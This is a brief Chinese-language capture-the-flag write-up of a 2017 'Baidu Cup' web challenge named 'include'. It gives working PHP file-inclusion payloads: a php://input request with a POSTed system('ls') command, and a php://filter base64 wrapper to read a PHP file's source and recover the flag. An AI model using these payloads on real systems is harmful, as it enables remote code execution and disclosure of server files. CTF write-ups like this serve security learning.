i春秋 CTF慢慢爬行之路（1）

“百度杯”CTF比赛 2017 二月场

  类型：Web 题目名称：include

刚进来只看到一个PHP页面和部分PHP代码，看看提示内容，文件包含漏洞。

不多说，用火狐hackbar直接构造：

？path=php://input

post内容：<?php echo system('ls');?>

会爆出具体有哪些文件。

再通过?path=php://filter/read=convert.base64-encode/resource=dle345aae.php

查看dle345aae.php文件中有些什么东西

得到一个字符串，由后面的“=”可以判断是Base64编码，通过Base64解码就能拿到flag